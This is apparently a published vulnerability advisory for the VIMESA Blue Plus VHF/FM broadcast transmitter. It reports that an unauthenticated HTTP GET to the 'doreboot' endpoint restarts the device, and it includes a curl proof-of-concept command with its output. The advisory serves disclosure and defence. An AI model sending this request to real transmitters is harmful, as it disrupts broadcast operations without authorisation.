Headline
VIMESA VHF/FM Transmitter Blue Plus 9.7.1 Denial Of Service
VIMESA VHF/FM Transmitter Blue Plus version 9.7.1 suffers from a denial of service vulnerability. An unauthenticated attacker can issue an unauthorized HTTP GET request to the unprotected endpoint doreboot and restart the transmitter operations.
VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of ServiceVendor: Video Medios, S.A. (VIMESA)Product web page: https://www.vimesa.esAffected version: img:v9.7.1 Html:v2.4 RS485:v2.5Summary: The transmitter Blue Plus is designed with allthe latest technologies, such as high efficiency usingthe latest generation LDMOS transistor and high efficiencypower supplies. We used a modern interface and performanceusing a color display with touch screen, with easy managementsoftware and easy to use. The transmitter is equipped withall audio input including Audio IP for a complete audiointerface. The VHF/FM transmitter 30-1000 is intendedfor the transmission of frequency modulated broadcastsin mono or stereo. It work with broadband characteristicsin the VHF frequency range from 87.5-108 MHz and can beoperated with any frequency in this range withoug alignment.The transmitter output power is variable between 10 and 110%of the nominal Power. It is available with different remotecontrol ports. It can store up to six broadcast programsincluding program specific parameters such as frequency,RF output power, modulation type, RDS, AF level and deviationlimiting. The transmitter is equipped with a LAN interfacethat permits the complete remote control of the transmitteroperation via SNMP or Web Server.Desc: The device is suffering from a Denial of Service (DoS)vulnerability. An unauthenticated attacker can issue an unauthorized HTTP GET request to the unprotected endpoint'doreboot' and restart the transmitter operations.Tested on: lighttpd/1.4.32Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2023-5798Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php22.07.2023--$ curl -v "http://192.168.3.11:5007/doreboot"* Trying 192.168.3.11:5007...* Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0)> GET /doreboot HTTP/1.1> Host: 192.168.3.11:5007> User-Agent: curl/8.0.1> Accept: */*>* Recv failure: Connection was reset* Closing connection 0curl: (56) Recv failure: Connection was reset